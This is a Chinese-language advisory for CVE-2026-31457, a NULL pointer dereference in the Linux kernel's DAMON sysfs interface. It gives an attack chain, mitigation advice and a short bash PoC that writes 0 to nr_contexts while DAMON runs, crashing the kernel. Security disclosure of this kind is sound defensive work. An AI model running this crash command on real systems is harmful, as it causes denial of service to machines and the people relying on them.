CVE-2026-31457 CVSS 5.5 中危

CVE-2026-31457 Linux内核DAMON空指针引用漏洞

披露日期: 2026-04-22

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-31457

漏洞类型

空指针引用

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核的mm/damon/sysfs组件存在空指针引用漏洞。当DAMON处于运行状态时，攻击者可通过sysfs接口将nr_contexts设置为0，导致damon_sysfs_repeat_call_fn函数在未检查的情况下访问空指针，引发系统拒绝服务。

技术细节

该漏洞位于Linux内核的DAMON sysfs接口中。函数damon_sysfs_repeat_call_fn在调用damon_sysfs_upd_tuned_intervals等更新函数时，未校验contexts->nr的值。如果攻击者在DAMON运行时，通过向/sys/kernel/mm/damon/admin/kdamonds/0/contexts/nr_contexts写入0，会导致后续代码尝试解引用contexts_arr[0]。由于此时该指针为NULL，从而触发内核崩溃，造成系统拒绝服务。

攻击链分析

STEP 1

步骤1

攻击者获取本地系统的低权限访问或Root权限。

STEP 2

步骤2

攻击者利用damo工具启动DAMON监控进程。

STEP 3

步骤3

攻击者通过sysfs接口将contexts数量设置为0。

STEP 4

步骤4

触发内核空指针解引用，导致系统崩溃或重启。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# PoC for CVE-2026-31457: NULL Pointer Dereference in DAMON
# Requirement: Root access and damo tool installed

# Start DAMON monitoring
sudo damo start --refresh_interval 1s &

# Wait for initialization
sleep 2

# Trigger the vulnerability by setting nr_contexts to 0
echo 0 | sudo tee /sys/kernel/mm/damon/admin/kdamonds/0/contexts/nr_contexts

影响范围

Linux Kernel (stable branches prior to fix)

Linux Kernel (prior to commit 3527e9f...)

防御指南

临时缓解措施

临时缓解措施包括严格限制对DAMON sysfs接口的访问权限，确保只有受信任的管理员才能修改内核参数，并监控系统的异常崩溃日志。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表